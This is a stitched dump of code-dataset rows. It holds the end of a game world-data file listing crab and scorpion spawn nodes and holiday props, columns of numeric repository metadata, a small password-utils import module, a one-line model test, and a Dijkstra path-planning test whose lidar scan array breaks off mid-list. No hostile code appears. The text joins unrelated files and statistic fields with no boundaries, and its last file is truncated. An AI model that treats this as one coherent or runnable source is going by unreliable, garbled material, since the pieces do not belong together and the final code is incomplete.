'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1189101641.11kmuller': {'Type': 'Player Spawn Node', 'Hpr': VBase3(-122.92, 0.0, 0.0), 'Index': 1, 'Pos': Point3(370.191, -357.047, 10.264), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1189101693.67kmuller': {'Type': 'Player Spawn Node', 'Hpr': VBase3(167.296, 0.0, 0.0), 'Index': 1, 'Pos': Point3(4.016, -471.999, 10.921), 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'All', 'VisSize': '', 'Visual': {'Color': (0.5, 0.5, 0.5, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(528.486, 71.76, 17.725), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe0': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(578.324, -7.22, 14.717), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe1': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': 
Point3(545.118, -160.422, 21.495), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe2': {'Type': 'Spawn Node', 'Aggro Radius': '21.0843', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(581.331, -230.437, 12.441), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe3': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(207.309, -426.927, 9.727), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe4': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(390.712, -234.692, 25.604), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T3', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 
'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe5': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(46.687, 368.522, 8.715), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe6': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(6.195, 326.657, 17.947), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357312.0dxschafe7': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(258.724, 301.051, 6.949), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357440.0dxschafe': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol 
Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(543.666, -204.087, 19.874), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357440.0dxschafe0': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(126.164, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(555.765, -277.98, 10.425), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357440.0dxschafe1': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(12.388, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(590.354, -178.998, 13.951), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T0', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1193357440.0dxschafe2': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(163.412, -468.794, 6.478), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Crab T1', 'Start State': 'Idle', 
'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890725.88piwanow': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(-159.444, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(57.897, -316.736, 26.041), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Patrol', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890800.17piwanow': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(149.036, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': '30', 'Pos': Point3(445.205, -81.831, 25.172), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890808.98piwanow': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(-25.201, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': '30', 'Pos': Point3(311.639, -230.79, 26.009), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890842.97piwanow': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 
0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(401.465, -100.152, 25.367), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1245890893.36piwanow': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': 100, 'Pause Duration': 30, 'Pos': Point3(347.257, -213.186, 25.759), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1245890966.97piwanow': {'Type': 'Spawn Node', 'AnimSet': 'default', 'Hpr': VBase3(-95.545, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': 100, 'Pause Duration': '30', 'Pos': Point3(251.138, 185.153, 26.013), 'PoseAnim': '', 'PoseFrame': '', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Scorp T1', 'Start State': 'Idle', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1245890983.39piwanow': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(354.425, 125.546, 26.731), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1245890987.89piwanow': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(432.517, 7.348, 25.311), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1257277464.2caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(154.997, 3.126, -6.668), 'Pos': Point3(453.792, 157.389, 24.139), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_snowman_generic_winter09'}}, '1257277510.51caoconno': {'Type': 'Holiday', 
'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-87.195, 0.0, 0.0), 'Pos': Point3(454.447, 155.965, 24.427), 'Scale': VBase3(1.662, 1.662, 1.662), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_sandpile02_winter09'}}}, 'Undockable': False, 'Visibility': 'Grid', 'Visual': {'Model': 'models/islands/pir_m_are_isl_devilsAnvil'}}}, 'Node Links': [['1245890808.98piwanow', '1245890842.97piwanow', 'Bi-directional'], ['1245890800.17piwanow', '1245890893.36piwanow', 'Bi-directional'], ['1245890983.39piwanow', '1245890966.97piwanow', 'Bi-directional'], ['1245890987.89piwanow', '1245890983.39piwanow', 'Bi-directional']], 'Layers': {}, 'ObjectIds': {'1164135492.81dzlu': '["Objects"]["1164135492.81dzlu"]', '1164766305.45sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1164766305.45sdnaik"]', '1168745928.39WDIG': '["Objects"]["1164135492.81dzlu"]["Objects"]["1168745928.39WDIG"]', '1172172361.37kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172172361.37kmuller"]', '1172208953.16sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172208953.16sdnaik"]', '1172208953.17sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172208953.16sdnaik"]["Objects"]["1172208953.17sdnaik"]', '1172208953.19sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172208953.16sdnaik"]["Objects"]["1172208953.19sdnaik"]', '1172209006.11sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172209006.11sdnaik"]', '1172209006.14sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172209006.11sdnaik"]["Objects"]["1172209006.14sdnaik"]', '1179265792.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265792.0dxschafe0"]', '1179265792.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265792.0dxschafe1"]', '1179265792.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265792.0dxschafe2"]', '1179265792.0dxschafe3': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265792.0dxschafe3"]', '1179265920.0dxschafe': 
'["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe"]', '1179265920.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe0"]', '1179265920.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe1"]', '1179265920.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe2"]', '1179265920.0dxschafe3': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe3"]', '1179265920.0dxschafe4': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe4"]', '1179265920.0dxschafe5': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe5"]', '1179266048.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe"]', '1179266048.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe0"]', '1179266048.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe1"]', '1179266048.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe2"]', '1179266048.0dxschafe3': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe3"]', '1179266176.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266176.0dxschafe"]', '1179266176.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266176.0dxschafe0"]', '1179288192.0JB0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179288192.0JB0"]', '1184890880.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184890880.0dxschafe0"]', '1184890880.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184890880.0dxschafe1"]', '1184891008.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184891008.0dxschafe"]', '1184891008.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184891008.0dxschafe0"]', '1184891008.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184891008.0dxschafe1"]', '1184891136.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184891136.0dxschafe"]', 
'1189100537.84kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100537.84kmuller"]', '1189100602.12kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100602.12kmuller"]', '1189100641.06kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100641.06kmuller"]', '1189100678.54kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100678.54kmuller"]', '1189100725.93kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100725.93kmuller"]', '1189100753.31kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100753.31kmuller"]', '1189101604.12kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189101604.12kmuller"]', '1189101641.11kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189101641.11kmuller"]', '1189101693.67kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189101693.67kmuller"]', '1193357312.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe"]', '1193357312.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe0"]', '1193357312.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe1"]', '1193357312.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe2"]', '1193357312.0dxschafe3': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe3"]', '1193357312.0dxschafe4': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe4"]', '1193357312.0dxschafe5': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe5"]', '1193357312.0dxschafe6': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe6"]', '1193357312.0dxschafe7': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe7"]', '1193357440.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357440.0dxschafe"]', '1193357440.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357440.0dxschafe0"]', '1193357440.0dxschafe1': 
'["Objects"]["1164135492.81dzlu"]["Objects"]["1193357440.0dxschafe1"]', '1193357440.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357440.0dxschafe2"]', '1245890725.88piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890725.88piwanow"]', '1245890800.17piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890800.17piwanow"]', '1245890808.98piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890808.98piwanow"]', '1245890842.97piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890842.97piwanow"]', '1245890893.36piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890893.36piwanow"]', '1245890966.97piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890966.97piwanow"]', '1245890983.39piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890983.39piwanow"]', '1245890987.89piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890987.89piwanow"]', '1257277464.2caoconno': '["Objects"]["1164135492.81dzlu"]["Objects"]["1257277464.2caoconno"]', '1257277510.51caoconno': '["Objects"]["1164135492.81dzlu"]["Objects"]["1257277510.51caoconno"]'}}
extraInfo = {'camPos': Point3(481.695, 145.91, 29.114), 'camHpr': VBase3(68.916, -10.2185, 0), 'focalLength': 1.39999997616, 'skyState': 2, 'fog': 0} | 4,772.142857 | 32,970 | 0.630385 | 4,456 | 33,405 | 4.713869 | 0.132406 | 0.029231 | 0.029707 | 0.022852 | 0.717543 | 0.619091 | 0.593287 | 0.576149 | 0.538681 | 0.53354 | 0 | 0.213622 | 0.08843 | 33,405 | 7 | 32,971 | 4,772.142857 | 0.476175 | 0.006496 | 0 | 0 | 0 | 0 | 0.569582 | 0.196239 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8620391ba777de68e9ada42b841817036b85bde9 | 122 | py | Python | gs/profile/password/__init__.py | groupserver/gs.profile.password | 72a3b117519e02edeef4e20134f7f715034c3252 | [
"ZPL-2.1"
] | null | null | null | gs/profile/password/__init__.py | groupserver/gs.profile.password | 72a3b117519e02edeef4e20134f7f715034c3252 | [
"ZPL-2.1"
] | null | null | null | gs/profile/password/__init__.py | groupserver/gs.profile.password | 72a3b117519e02edeef4e20134f7f715034c3252 | [
"ZPL-2.1"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
#lint:disable
from .utils import password_set
#lint:enable
| 20.333333 | 38 | 0.762295 | 17 | 122 | 5.117647 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009346 | 0.122951 | 122 | 5 | 39 | 24.4 | 0.803738 | 0.360656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
86f78574e229091fd1a36a9d5aa68f4529c288b1 | 129 | py | Python | tests/test_models.py | semantic-systems/event_extraction | 920ae4dfb174f1aee0f368979cb90167b1c24465 | [
"Apache-2.0"
] | null | null | null | tests/test_models.py | semantic-systems/event_extraction | 920ae4dfb174f1aee0f368979cb90167b1c24465 | [
"Apache-2.0"
] | null | null | null | tests/test_models.py | semantic-systems/event_extraction | 920ae4dfb174f1aee0f368979cb90167b1c24465 | [
"Apache-2.0"
] | 1 | 2022-01-26T09:58:10.000Z | 2022-01-26T09:58:10.000Z |
def test_initialize_model(model_instance):
assert model_instance
assert len(model_instance.encoder.encoder.layer) == 2
| 21.5 | 57 | 0.782946 | 17 | 129 | 5.647059 | 0.588235 | 0.40625 | 0.395833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.139535 | 129 | 5 | 58 | 25.8 | 0.855856 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
81177cf3dfb1463697448f5da6f6e183ebc6461a | 12,157 | py | Python | navigation/scripts/grid_based/tests/dijkstra_test.py | archit2604/Trotbot | 8ff34049b9c81fa50d29493b5669140b0f75d0d5 | [
"MIT"
] | 1 | 2020-08-04T12:00:18.000Z | 2020-08-04T12:00:18.000Z | navigation/scripts/grid_based/tests/dijkstra_test.py | archit2604/Trotbot | 8ff34049b9c81fa50d29493b5669140b0f75d0d5 | [
"MIT"
] | null | null | null | navigation/scripts/grid_based/tests/dijkstra_test.py | archit2604/Trotbot | 8ff34049b9c81fa50d29493b5669140b0f75d0d5 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
import time
import sys
import os
import numpy as np
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../mapping')))
try:
from dijkstra import Dijkstra
from lidar_to_grid import Mapper
except:
raise ImportError("Dijkstra Could'nt be imported")
def test1():
inf = np.inf
scan =[inf, inf, inf, inf, inf, inf, inf, 3.056861639022827, 3.0252268314361572, 3.0203325748443604, 2.0132949352264404, 1.9735280275344849, 1.953012466430664, 1.9486260414123535, 1.9373271465301514, 1.9421530961990356, 1.9569212198257446, 2.002772331237793, inf, inf, inf, 0.9855800271034241, 0.9726546406745911, 0.9509224891662598, 0.9256065487861633, 0.9257093071937561, 0.922886073589325, 0.9183664917945862, 0.906120240688324, 0.8961981534957886, 0.9056581854820251, 0.9420517683029175, 0.9265859723091125, 0.9183934330940247, 0.9498110413551331, 0.9667358994483948, 1.0045623779296875, 2.442192792892456, 2.4326982498168945, 2.4553067684173584, 2.4645442962646484, 2.506408214569092, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 1.7533923387527466, 1.71872878074646, 1.70149827003479, 1.6858848333358765, 1.6909033060073853, 1.7164965867996216, 1.7079846858978271, 1.7376644611358643, 1.785688877105713, 3.3595521450042725, 3.3191449642181396, 3.29377818107605, 3.2705166339874268, 3.2538671493530273, 3.2152647972106934, 3.2159855365753174, 3.19524884223938, 3.0854270458221436, 2.8649425506591797, 2.6712183952331543, 2.554349184036255, 2.556751251220703, 2.5452141761779785, 2.5436341762542725, 2.5213427543640137, 2.5272300243377686, 2.5183942317962646, 2.509161949157715, 2.5124869346618652, 2.4297120571136475, 2.3386430740356445, 2.2512683868408203, 2.1818249225616455, 2.103046417236328, 2.0564870834350586, 1.9878475666046143, 1.9268088340759277, 1.885642170906067, 1.8311305046081543, 1.7829922437667847, 1.7410887479782104, 1.7179292440414429, 1.65846848487854, 1.6332777738571167, 1.5900510549545288, 1.5677014589309692, 1.5201916694641113, 1.4969840049743652, 1.4841266870498657, 1.4385578632354736, 1.4428545236587524, 1.4075186252593994, 1.3866387605667114, 1.3508318662643433, 1.3370169401168823, 1.3260891437530518, 1.3067781925201416, 1.2939659357070923, 1.2805120944976807, 1.2707873582839966, 1.2281290292739868, 1.2153609991073608, 
